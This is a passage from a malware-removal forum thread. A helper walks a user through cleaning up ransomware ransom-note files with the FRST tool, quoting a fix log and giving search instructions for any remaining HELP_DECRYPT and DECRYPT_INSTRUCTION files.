C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Recent\DECRYPT_INSTRUCTION.lnk => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.PNG => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.URL => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.PNG => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.URL => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.HTML => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.PNG => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.TXT => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.URL => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog 06:27:16 ====

  • 0

#15
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Sorry for the delay; we need to check that there are no more Decrypt files spawning on the system.

 

First, let's remove the ones in Quarantine (FRST's Quarantine) by running the attached script.

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show that it is ready to use (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.

Press%20the%20FIX%20button_zpslenkmnr9.p

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post the log in your next reply.

 

Second, search with FRST for any files >>>>

 

Start FRST64 by right clicking on it and selecting "Run as Administrator"

 

Once it opens, copy the following text into the Search box.

 

 

HELP_DECRYPT.*;DECRYPT_INSTRUCTION.*

 

 

 

Click the Search Files button and wait.  FRST will display a procgress bar and messages and when finished, produce a Search.txt log file.  Please attach that file to a reply post here (it will most likely be too large to paste the text in a reply).

 

Attached Files


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP